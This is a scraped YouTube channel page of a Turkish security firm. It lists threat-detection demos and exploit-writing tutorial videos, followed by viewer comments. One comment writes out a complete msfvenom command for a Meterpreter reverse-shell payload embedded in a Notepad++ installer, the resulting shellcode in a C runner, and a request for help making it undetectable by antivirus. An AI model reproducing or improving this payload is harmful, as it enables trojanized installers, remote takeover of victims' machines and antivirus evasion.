- 51
- 29 369
BTRisk - Bilgi Güvenliği ve BT Yönetişim Hizmetleri
Приєднався 15 кві 2014
2009 yılında kurulmuş ve sadece bilgi güvenliği hizmetlerine odaklanmış olan BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri bilgi güvenliği problemine yönetim kurulu seviyesinden sistem odası uygulamasına kadar uzanan alanda çözüm üretmektedir.
BTRisk bilgi güvenliği problemini görünür hale getirerek algılanmasını, anlaşılmasını ve dolayısıyla ele alınmasını mümkün hale getirmektedir.
BTRisk bilgi güvenliği problemine karşı geliştirdiği yaklaşımları gerçek hayat koşullarında test etmiş ve uygulanabilir hale getirmiştir.
BTRisk bilgi güvenliği problemini görünür hale getirerek algılanmasını, anlaşılmasını ve dolayısıyla ele alınmasını mümkün hale getirmektedir.
BTRisk bilgi güvenliği problemine karşı geliştirdiği yaklaşımları gerçek hayat koşullarında test etmiş ve uygulanabilir hale getirmiştir.
HTTP Session detection with ACKLOG
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for HTTP Session activities @BTRisk
Переглядів: 21
Відео
HTTP Beacon detection with ACKLOG
Переглядів 202 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for HTTP Beacon activities @BTRisk
Apache Webshell detection with ACKLOG
Переглядів 302 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for Apache Webshell activities @BTRisk
Web Scan detection with ACKLOG
Переглядів 392 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for Web Scan activities @BTRisk
Large HTTP Download detection with ACKLOG
Переглядів 172 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for Large HTTP Download activities @BTRisk
Active Directory Password Bruteforce detection with ACKLOG
Переглядів 302 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for Active Directory Password Bruteforce activities @BTRisk
Port Scanning detection with TRAPPOT and ACKLOG
Переглядів 272 місяці тому
Advanced Persistent Threat detection and Threat Hunting with TRAPPOT and ACKLOG for Port Scanning activities @BTRisk
Port Scanning detection with ACKLOG
Переглядів 292 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for Port Scanning activities @BTRisk
DNS Session detection with ACKLOG
Переглядів 272 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for DNS Session activities @BTRisk
LDAP Enumeration detection with ACKLOG
Переглядів 252 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for LDAP Enumeration activities @BTRisk
DNS Beacon detection with ACKLOG
Переглядів 692 місяці тому
Advanced Persistent Threat detection and Threat Hunting with ACKLOG for DNS Beacon activities @BTRisk
Practical Threat Hunting with SIEM - Security First CEE - Computerworld Poland
Переглядів 351Рік тому
Our current cyber security paradigm dictates that we must assume the attacker is either already in our network or forcing its doors every chance it has. That makes threat hunting one of the routine periodic (if not continuous) security operations today. The need to monitor the endpoints is ever increasing, however, that does not diminish the value of network wide analytic reviews to identify th...
BTRisk Bilgi Güvenliği ve Bilgi Teknolojileri Yönetişim Hizmetleri KısaTanıtımı
Переглядів 1483 роки тому
BTRisk Bilgi Güvenliği Sızma Testi (Pentest) Hizmetleri ISO27001 Danışmanlığı Bilgi Teknolojileri Denetimi BTRWATCH GRC Yazılımı BTROTP MFA Yazılımı
DDOS & Load (Yük) Testi Nedir
Переглядів 5634 роки тому
DDOS ve yük testlerinin amaçları, kullanılan payload nitelikleri, DDOS test metodolojisi, load (yük) testi metodolojisi blog.btrisk.com/2020/05/ddos-load-yuk-testi-nedir.html Sızma Testi (Pentest / Penetrasyon Testi) Hizmeti Sızma Testi (Pentest / Penetration Test), Sosyal Mühendislik Testi ve DDOS / Yük Testi Hizmetleri ile siber güvenlik seviyenizi artırın. www.btrisk.com/hizmetler/sizma-test...
Social Engineering (Sosyal Mühendislik) Testi Nedir?
Переглядів 3034 роки тому
Social engineering (sosyal mühendislik) testlerinin amaçları, sosyal mühendislik test metodolojisi blog.btrisk.com/2020/05/social-engineering-sosyal-muhendislik-nedir.html Sızma Testi (Pentest / Penetrasyon Testi) Hizmeti Sızma Testi (Pentest / Penetration Test), Sosyal Mühendislik Testi ve DDOS / Yük Testi Hizmetleri ile siber güvenlik seviyenizi artırın. www.btrisk.com/hizmetler/sizma-testi-p...
Mobile Application Pentest (Mobil Uygulama Sızma Testi) Nedir?
Переглядів 8984 роки тому
Mobile Application Pentest (Mobil Uygulama Sızma Testi) Nedir?
Web Application Pentest (Web Uygulama Sızma Testi) Nedir?
Переглядів 9394 роки тому
Web Application Pentest (Web Uygulama Sızma Testi) Nedir?
Network Pentest (Ağ Sızma Testi) Nedir?
Переглядів 1,2 тис.4 роки тому
Network Pentest (Ağ Sızma Testi) Nedir?
Siber Güvenlikte Avrupa Ülkelerindeki Durum ve Türkiye Karşılaştırması
Переглядів 5994 роки тому
Siber Güvenlikte Avrupa Ülkelerindeki Durum ve Türkiye Karşılaştırması
vTable Exploit'leri - Bölüm-4: vTable Yapısını Ezerek Exploit Etme
Переглядів 5559 років тому
vTable Exploit'leri - Bölüm-4: vTable Yapısını Ezerek Exploit Etme
vTable Exploit'leri - Bölüm-3: vTable Yapısı Dinamik Analiz
Переглядів 1749 років тому
vTable Exploit'leri - Bölüm-3: vTable Yapısı Dinamik Analiz
vTable Exploit'leri - Bölüm-2: vTable Yapısı Statik Analiz
Переглядів 2719 років тому
vTable Exploit'leri - Bölüm-2: vTable Yapısı Statik Analiz
vTable Exploit'leri - Bölüm-1: Fonksiyon pointer'ları
Переглядів 7089 років тому
vTable Exploit'leri - Bölüm-1: Fonksiyon pointer'ları
SEH Exploit'leri - Bölüm-7: SEH Exploit Yöntemimiz
Переглядів 2059 років тому
SEH Exploit'leri - Bölüm-7: SEH Exploit Yöntemimiz
SEH Exploit'leri - Bölüm-6: SEH Exploit Seçeneklerimiz
Переглядів 1629 років тому
SEH Exploit'leri - Bölüm-6: SEH Exploit Seçeneklerimiz
SEH Exploit'leri - Bölüm-5: SEH Kaydının Ezilmesi
Переглядів 1399 років тому
SEH Exploit'leri - Bölüm-5: SEH Kaydının Ezilmesi
SEH Exploit'leri - Bölüm-2: SEH Statik Analizi
Переглядів 1969 років тому
SEH Exploit'leri - Bölüm-2: SEH Statik Analizi
SEH Exploit'leri - Bölüm-4: SEH Teorik Bilgi
Переглядів 1649 років тому
SEH Exploit'leri - Bölüm-4: SEH Teorik Bilgi
Merhaba, anlattıklarınız çok değerli ve bu işin asıl mutfağı burası ancak ben hiç bir şey anlamadım 😂 bu konuda kendimi geliştirmek istiyorum, daha basit düzeyde benim gibi temelsiz birisinin bile anlayabileceği bir kaynak var mı? Bana çok zor geliyor.
Çok güzel açıklanmış faydalı bir içerik
Merhaba acaba bu h@ck programları bilgisayara ve ya diske , dosyalara zararı olurmu? cevaplarsanız sevinirim teşekkürler)
Olmaz.
@@MentorFatih yasa dışı ise bulaşmadan siber güvenlik öğrenebilir miyiz Kali linuxten
Saol abi
ellerinize sağlık...
güzel video ellerinize sağlık
çok güzel bir video olmuş ellerinize sağlık
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 -f c -x /home/kali/Downloads/npp.7.9.2.Installer.exe -k -e x86/shikata_ga_nai -a x86 -b '\x00\xff' bu kodu kali terminalde yazıp unsigned char shellcode[]= "\xdb\xc7\xbb\x0c\x6d\xb1\x09\xd9\x74\x24\xf4\x58\x31\xc9\xb1" "\x56\x31\x58\x18\x03\x58\x18\x83\xe8\xf0\x8f\x44\xf5\xe0\xd2" "\xa7\x06\xf0\xb2\x2e\xe3\xc1\xf2\x55\x67\x71\xc3\x1e\x25\x7d" "\xa8\x73\xde\xf6\xdc\x5b\xd1\xbf\x6b\xba\xdc\x40\xc7\xfe\x7f" "\xc2\x1a\xd3\x5f\xfb\xd4\x26\xa1\x3c\x08\xca\xf3\x95\x46\x79" "\xe4\x92\x13\x42\x8f\xe8\xb2\xc2\x6c\xb8\xb5\xe3\x22\xb3\xef" "\x23\xc4\x10\x84\x6d\xde\x75\xa1\x24\x55\x4d\x5d\xb7\xbf\x9c" "\x9e\x14\xfe\x11\x6d\x64\xc6\x95\x8e\x13\x3e\xe6\x33\x24\x85" "\x95\xef\xa1\x1e\x3d\x7b\x11\xfb\xbc\xa8\xc4\x88\xb2\x05\x82" "\xd7\xd6\x98\x47\x6c\xe2\x11\x66\xa3\x63\x61\x4d\x67\x28\x31" "\xec\x3e\x94\x94\x11\x20\x77\x48\xb4\x2a\x95\x9d\xc5\x70\xf1" "\x52\xe4\x8a\x01\xfd\x7f\xf8\x33\xa2\x2b\x96\x7f\x2b\xf2\x61" "\xf6\x3b\x05\xbd\xb0\x2c\xfb\x3e\xc0\x65\x38\x6a\x90\x1d\xe9" "\x13\x7b\xde\x16\xc6\x11\xd4\x80\x29\x4d\xea\xc9\xc2\x8f\xeb" "\xf8\x4e\x06\x0d\xaa\x3e\x48\x82\x0b\xef\x28\x72\xe4\xe5\xa7" "\xad\x14\x06\x62\xc6\xbf\xe9\xda\xbe\x57\x93\x47\x34\xc9\x5c" "\x52\x30\xc9\xd7\x56\xc4\x84\x1f\x13\xd6\xf1\x47\xdb\x26\x02" "\xe2\xdb\x4c\x06\xa4\x8c\xf8\x04\x91\xfa\xa6\xf7\xf4\x79\xa0" "\x08\x89\x4b\xda\x3f\x1f\xf3\xb4\x3f\xcf\xf3\x44\x16\x85\xf3" "\x2c\xce\xfd\xa0\x49\x11\x28\xd5\xc1\x84\xd3\x8f\xb6\x0f\xbc" "\x2d\xe0\x78\x63\xce\xc7\xfa\x64\x30\x95\xd4\xcc\x58\x65\x65" "\xed\x98\x0f\x65\xbd\xf0\xc4\x4a\x32\x30\x24\x41\x1b\x58\xaf" "\x04\xe9\xf9\xb0\x0c\xaf\xa7\xb1\xa3\x74\x58\xcb\xcc\x8b\x99" "\x2c\xc5\xef\x9a\x2c\xe9\x11\xa7\xfa\xd0\x67\xe6\x3e\x67\x77" "\x5d\x62\xce\x12\x9d\x30\x10\x37"; int main(int argc, char **argv){ int(*f)(); f=(int(*)())shellcode; (int)(*f)(); } bu kodu gcc ile gcc /home/kali/Desktop/shell.c -o /home/kali/Desktop/shell4.exe şekilde derleyip virüs totale yüklediğimde 63 virüs programından 7 tanesinin yakaladığını görebiliyorum. 0 tespite nasıl düşebilirim. FUD Payload nasıl yapabilirim? Ve bu kod hedef sistemde çalışır mı? exploit/multi/handler kullanarak shell alabilir miyim? Yada exploit ederken bu kadun derlenmiş halini generic/shell payload olarak kullanabilir miyim?
kodları atarsanız sevinirim. bir de msfvenomda encode özelliğini kullandığımızda kod kendi içerisinde decode kısmını da kendisi ekliyor mu? Söylediğiniz gibi encode edilmiş kod decode edilmesi gerekiyor.
evet ekliyor ve shellcode decode kısmı eklendiğinden dolayı boyutu artıyor.
Unsigned char shellcode kısmı msfvenomdan -f c olarak yazılınca kalide bize yazdırılıyor. Onu da C kodunun içerisinde kullanabiliriz sanırım ama bu C kodunu kalide gcc doğrudan derlediğimde kod çalışmıyor. Visual Stdio da ilk videoda güvenlik denetimini devre dışı bırakması için seçim yapmıştık. Aynı derleme işlemini gcc ile yapmak istesek, gcc ile aynı seçimi yapabilir miyiz.
shell kod eğitimindeki yazmış olduğunuz kodları ekleyebilir misiniz?
hocam ağzına saglık
Daha fazla video atar mısınız
Niye böyle şeyler daha az izleniyor
Elinize sağlık hocam değerli bir içerik
Hocam ağzınıza sağlık 👏
1.bolumden berı ızlıyorum hıc bır sey anlamadım neden ızlıyorum nedenını de bılmıyorum delirdim galiba buraya kadar benden kolaygelsın bundan sonrakı hayatında
güzel anlatım olmuş elinize sağlık hocam
Abi sadece 3 tür exploit yazmami var ?
iyi günler cok güzel bir çalışma olmuş izne cıkarcıkmaz hepsini izlyecem bana bir sıralama verirmisiniz bilgim sıfır bu konularda baştan başlıyıp hepsini izlicem sırayla gidersem takılmam fazla olmaz.
Video altın değerinde altın !
+Nandblow millet anlamıyor işte hocam değerini
Çok Güzel Anlatmışsınız. Teşekür Ediyorum.
Totally cool brah